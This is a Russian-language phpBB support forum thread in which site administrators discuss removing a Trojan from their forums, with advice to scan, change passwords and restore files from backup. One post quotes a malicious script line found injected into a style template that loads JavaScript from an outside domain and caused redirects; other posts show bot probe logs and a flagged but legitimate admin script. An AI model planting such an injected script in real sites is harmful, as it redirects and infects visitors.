Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.

Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 17 лет 6 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Аватара пользователя
angst66
phpBB 3.0.0 RC1
Сообщения: 1469
Стаж: 12 лет 2 месяца
Благодарил (а): 86 раз
Поблагодарили: 149 раз

Re: Как убить Трояна?

Сообщение angst66 »

Вспомнив точно, когда я видел в телефоне нормальный сайт, скачал бэкап и сравнил его со вчерашней версией. Как я и предполагал (много почитав в интернетах), что скорее всего нужно искать в js файлах. Нашлось несовпадение в папке шабона одного из стилей. Вот код, который прописался в самом конце

Код: Выделить всё

<!-- js-tools -->
document.write('<script type="text/javascript" src="http://mlvjs19.org/?acc=12242&waponly=opt&zona=0&landing=xcust"></script>');
<!-- /js-tools -->
Все почистил, пароли поменяны, редиректа больше нет.
Аватара пользователя
Пчелкин
phpBB 3.3.0
Сообщения: 11234
Стаж: 14 лет 2 месяца
Откуда: fotovideoforum.ru
Благодарил (а): 1782 раза
Поблагодарили: 1340 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Пчелкин »

Может вопрос не к месту...Но тем не менее...в логах хостера наблюдаются вот такие запросы к несуществующим файлам...Что это и откуда могет быть?
"12645" [Fri Oct 25 23:56:16 2013] [error] [client 110.87.141.50] script not found or unable to stat: /www/caldinac/www/htdocs/signup.php
"12645" [Fri Oct 25 23:56:28 2013] [error] [client 110.87.141.50] script not found or unable to stat: /www/caldinac/www/htdocs/signup.php
"12645" [Fri Oct 25 23:56:36 2013] [error] [client 110.87.141.50] script not found or unable to stat: /www/caldinac/www/htdocs/register.php
"12645" [Fri Oct 25 23:57:06 2013] [error] [client 110.87.141.50] script not found or unable to stat: /www/caldinac/www/htdocs/profile.php
"12645" [Sat Oct 26 00:01:25 2013] [error] [client 66.249.75.206] script not found or unable to stat: /www/caldinac/www/htdocs/go.php
"12645" [Sat Oct 26 00:34:47 2013] [error] [client 178.137.91.234] script not found or unable to stat: /www/caldinac/www/htdocs/admin.php
Там таких файлов в корне никак не может быть...
Anvar
Former team member
Сообщения: 1965
Стаж: 14 лет
Благодарил (а): 67 раз
Поблагодарили: 799 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Anvar »

За-то у 2.0.23 могут быть эти файлы. Стоял когда-нибудь такой?
Не пишите вопросы лично, если можете задать их на форуме!
Спецзаказы не интересуют!
Аватара пользователя
владимир1983
phpBB 3.2.6
Сообщения: 5954
Стаж: 13 лет 11 месяцев
Откуда: Сергиев Посад
Благодарил (а): 374 раза
Поблагодарили: 727 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение владимир1983 »

Боты. Не обращай внимания.
За ваши деньги решу ваши проблемы. Стучи в ЛС.
Нет человека - нет проблемы. (c)
Аватара пользователя
xisp
phpBB 3.0.0 RC7
Сообщения: 1798
Стаж: 11 лет 10 месяцев
Благодарил (а): 152 раза
Поблагодарили: 215 раз
Забанен: Бессрочно

Re: Как убить Трояна?

Сообщение xisp »

Пчелкин писал(а):Может вопрос не к месту...Но тем не менее...в логах хостера наблюдаются вот такие запросы к несуществующим файлам...Что это и откуда могет быть?
Обычные школьники с обычными скриптами пытаются найти доступ в админку. Не стоит обращать внимания.
phpBBex
Аватара пользователя
Пчелкин
phpBB 3.3.0
Сообщения: 11234
Стаж: 14 лет 2 месяца
Откуда: fotovideoforum.ru
Благодарил (а): 1782 раза
Поблагодарили: 1340 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Пчелкин »

Да...этот форум был переведен с двойки...
владимир1983 писал(а):Боты. Не обращай внимания.
Типа у них запросы на такие старые весчи делаются? афигеть...Просщупывают или не имеют автоопределения куда попали и как?
Anvar
Former team member
Сообщения: 1965
Стаж: 14 лет
Благодарил (а): 67 раз
Поблагодарили: 799 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Anvar »

Создай эти файлы и редиректи в чат, а там спроси - "чего надобно старче?" :-D
Не пишите вопросы лично, если можете задать их на форуме!
Спецзаказы не интересуют!
Аватара пользователя
xisp
phpBB 3.0.0 RC7
Сообщения: 1798
Стаж: 11 лет 10 месяцев
Благодарил (а): 152 раза
Поблагодарили: 215 раз
Забанен: Бессрочно

Re: Как убить Трояна?

Сообщение xisp »

Пчелкин писал(а):Просщупывают или не имеют автоопределения куда попали и как?
Зачем? Проще спамить всеми возможными вариантами. Быстрее выходит.
phpBBex
Аватара пользователя
c61
phpBB 2.0.6
Сообщения: 506
Стаж: 11 лет 3 месяца
Благодарил (а): 42 раза
Поблагодарили: 251 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение c61 »

Пчелкин, немного не по теме, но как параноик со стажем замечу, что у Вас на фотовидефоруме открыт каталог стилей (тырь - не хочу) и в php.ini включен expose_php (есть пасхалки и прочее), что позволяет идентифицировать версии используемого ПО. Остальные мелочи несущественны))
Аватара пользователя
Пчелкин
phpBB 3.3.0
Сообщения: 11234
Стаж: 14 лет 2 месяца
Откуда: fotovideoforum.ru
Благодарил (а): 1782 раза
Поблагодарили: 1340 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Пчелкин »

c61 писал(а):открыт каталог стилей
А вот с этого места подробней
(а Вас, Штирлиц. я попрошу остаться(с))
Разговор был не про мой форум...про чужой.....

Добавлено спустя 1 минуту 58 секунд:
Anvar писал(а):Создай эти файлы и редиректи в чат, а там спроси - "чего надобно старче?"
Идея прикольная, но у них нет чата...хотя мысль подхватил...
Anvar
Former team member
Сообщения: 1965
Стаж: 14 лет
Благодарил (а): 67 раз
Поблагодарили: 799 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Anvar »

c61, спасибо, пошел стили Пчелкина качать, а то все откладывал в дальний ящик :-D
Не пишите вопросы лично, если можете задать их на форуме!
Спецзаказы не интересуют!
Аватара пользователя
Пчелкин
phpBB 3.3.0
Сообщения: 11234
Стаж: 14 лет 2 месяца
Откуда: fotovideoforum.ru
Благодарил (а): 1782 раза
Поблагодарили: 1340 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Пчелкин »

Ну ну...побейся аб стену.... гы...
Regal
phpBB 1.0.0
Сообщения: 3
Стаж: 10 лет 2 месяца

Re: Как убить Трояна?

Сообщение Regal »

добрый день!

Установил phpbb 3.0.12. После установки не могу зайти в админку, не пускает касперский, говорит что объект заражен HEUR:Trojan.Script.Generic. причем сам форум работает.

Комп проверил на вирусы - чисто!
Паменял все пароли - не помогло!
Подозрительных ссылок на другие ресурсы в коде нет! проверил!
Никакой переадресации нет!
файлы Index.* все чистые с бэкапа!

Помогите, что сделать?? как исправить?
Regal
phpBB 1.0.0
Сообщения: 3
Стаж: 10 лет 2 месяца

Re: Как убить Трояна?

Сообщение Regal »

нашел, что каспер ругается на следующий скрипт, который прописан в файле phpBB3\adm\style\overall_header.html
скрипт 
<script type="text/javascript">
// <![CDATA[
var jump_page = '{LA_JUMP_PAGE}:';
var on_page = '{ON_PAGE}';
var per_page = '{PER_PAGE}';
var base_url = '{A_BASE_URL}';

var menu_state = 'shown';


/**
* Jump to page
*/
function jumpto()
{
var page = prompt(jump_page, on_page);

if (page !== null && !isNaN(page) && page == Math.floor(page) && page > 0)
{
if (base_url.indexOf('?') == -1)
{
document.location.href = base_url + '?start=' + ((page - 1) * per_page);
}
else
{
document.location.href = base_url.replace(/&/g, '&') + '&start=' + ((page - 1) * per_page);
}
}
}

/**
* Set display of page element
* s[-1,0,1] = hide,toggle display,show
*/
function dE(n, s, type)
{
if (!type)
{
type = 'block';
}

var e = document.getElementById(n);
if (!s)
{
s = (e.style.display == '') ? -1 : 1;
}
e.style.display = (s == 1) ? type : 'none';
}

/**
* Mark/unmark checkboxes
* id = ID of parent container, name = name prefix, state = state [true/false]
*/
function marklist(id, name, state)
{
var parent = document.getElementById(id);
if (!parent)
{
eval('parent = document.' + id);
}

if (!parent)
{
return;
}

var rb = parent.getElementsByTagName('input');

for (var r = 0; r < rb.length; r++)
{
if (rb[r].name.substr(0, name.length) == name)
{
rb[r].checked = state;
}
}
}

/**
* Find a member
*/
function find_username(url)
{
popup(url, 760, 570, '_usersearch');
return false;
}

/**
* Window popup
*/
function popup(url, width, height, name)
{
if (!name)
{
name = '_popup';
}

window.open(url.replace(/&/g, '&'), name, 'height=' + height + ',resizable=yes,scrollbars=yes, width=' + width);
return false;
}

/**
* Hiding/Showing the side menu
*/
function switch_menu()
{
var menu = document.getElementById('menu');
var main = document.getElementById('main');
var toggle = document.getElementById('toggle');
var handle = document.getElementById('toggle-handle');

switch (menu_state)
{
// hide
case 'shown':
main.style.width = '93%';
menu_state = 'hidden';
menu.style.display = 'none';
toggle.style.width = '20px';
handle.style.backgroundImage = 'url(images/toggle.gif)';
handle.style.backgroundRepeat = 'no-repeat';

<!-- IF S_CONTENT_DIRECTION eq 'rtl' -->
handle.style.backgroundPosition = '0% 50%';
toggle.style.left = '96%';
<!-- ELSE -->
handle.style.backgroundPosition = '100% 50%';
toggle.style.left = '0';
<!-- ENDIF -->
break;

// show
case 'hidden':
main.style.width = '76%';
menu_state = 'shown';
menu.style.display = 'block';
toggle.style.width = '5%';
handle.style.backgroundImage = 'url(images/toggle.gif)';
handle.style.backgroundRepeat = 'no-repeat';

<!-- IF S_CONTENT_DIRECTION eq 'rtl' -->
handle.style.backgroundPosition = '100% 50%';
toggle.style.left = '75%';
<!-- ELSE -->
handle.style.backgroundPosition = '0% 50%';
toggle.style.left = '15%';
<!-- ENDIF -->
break;
}
}

// ]]>
</script>
после его удаления в админку пускает касперский.

Что это за подозрительный скрипт???? и что он делает?
Аватара пользователя
Pazh
Former team member
Сообщения: 2317
Стаж: 14 лет 4 месяца
Благодарил (а): 43 раза
Поблагодарили: 506 раз
Контактная информация:

Re: Как убить Трояна?

Сообщение Pazh »

Regal скорее не на это , а на то что ты передаешь в одну из переменных из фигурных скобок

Код: Выделить всё

var jump_page = '{LA_JUMP_PAGE}:';
var on_page = '{ON_PAGE}';
var per_page = '{PER_PAGE}';
var base_url = '{A_BASE_URL}';
Помощь в ЛС/email только за WM или ЮMoney
Ответить

Вернуться в «phpBB-пространство»